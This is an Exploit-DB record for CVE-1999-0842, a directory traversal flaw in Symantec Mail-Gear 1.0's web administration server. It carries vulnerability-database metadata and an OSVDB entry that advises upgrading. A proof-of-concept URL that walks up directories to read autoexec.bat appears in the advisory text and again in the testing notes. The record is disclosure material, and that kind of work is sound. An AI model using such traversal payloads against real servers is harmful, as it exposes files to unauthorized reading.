source: http://www.securityfocus.com/bid/827/info
Mail-Gear, a multi-purpose filtering email server, includes a webserver for remote administration and email retrieval. This webserver is vulnerable to the '../' directory traversal attack. By including the string '../' in the URL, remote attackers can gain read access to all files on the filesystem that the server has read access to.
http: //target.host:8003/Display?what=../../../../../autoexec.bat
will display the server's autoexec.bat in a default NT installation.
{"id": "EDB-ID:19644", "hash": "ce877569d26fe04f8a45e1123ae2d2c5", "type": "exploitdb", "bulletinFamily": "exploit", "title": "symantec mail-gear 1.0 - Directory Traversal Vulnerability", "description": "Symantec Mail-Gear 1.0 Directory Traversal Vulnerability. CVE-1999-0842 . Remote exploits for multiple platform", "published": "1999-11-29T00:00:00", "modified": "1999-11-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/19644/", "reporter": "Ussr Labs", "references": [], "cvelist": ["CVE-1999-0842"], "lastseen": "2016-02-02T12:20:46", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2016-02-02T12:20:46"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-1999-0842"]}, {"type": "osvdb", "idList": ["OSVDB:1144"]}], "modified": "2016-02-02T12:20:46"}, "vulnersScore": 6.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/19644/", "sourceData": "source: http://www.securityfocus.com/bid/827/info\r\n\r\nMail-Gear, a multi-purpose filtering email server, includes a webserver for remote administration and email retrieval. This webserver is vulnerable to the '../' directory traversal attack. By including the string '../' in the URL, remote attackers can gain read access to all files on the filesystem that the server has read access to. \r\n\r\n\r\nhttp: //target.host:8003/Display?what=../../../../../autoexec.bat\r\nwill display the server's autoexec.bat in a default NT installation. ", "osvdbidlist": ["1144"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:07:36", "bulletinFamily": "NVD", "description": "Symantec Mail-Gear 1.0 web interface server allows remote users to read arbitrary files via a .. (dot dot) attack.", "modified": "2008-09-09T12:36:00", "id": "CVE-1999-0842", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0842", "published": "1999-11-29T05:00:00", "title": "CVE-1999-0842", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "description": "## Vulnerability Description\nSymantec Mail-Gear contains a flaw that allows a remote attacker to view arbitrary files outside of the web path. The issue is due to the \"Display\" not properly sanitizing user input, specifically traversal style attacks (../../) supplied via the \"what\" variable.\n## Solution Description\nUpgrade to version 1.1 or higher, as it has been reported to fix this \nvulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nSymantec Mail-Gear contains a flaw that allows a remote attacker to view arbitrary files outside of the web path. The issue is due to the \"Display\" not properly sanitizing user input, specifically traversal style attacks (../../) supplied via the \"what\" variable.\n## Manual Testing Notes\nhttp://[victim]:8003/Display?what=../../../../../autoexec.bat\n## References:\nVendor URL: http://www.symantec.com/urlabs/public/index.html\nOther Advisory URL: http://www.ussrback.com/labs17.html\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=94391064306273&w=2\nKeyword: Directory Traversal\nISS X-Force ID: 3649\n[CVE-1999-0842](https://vulners.com/cve/CVE-1999-0842)\nBugtraq ID: 827\n", "modified": "1999-11-29T00:00:00", "published": "1999-11-29T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:1144", "id": "OSVDB:1144", "title": "Symantec Mail-Gear Arbitrary File Access", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}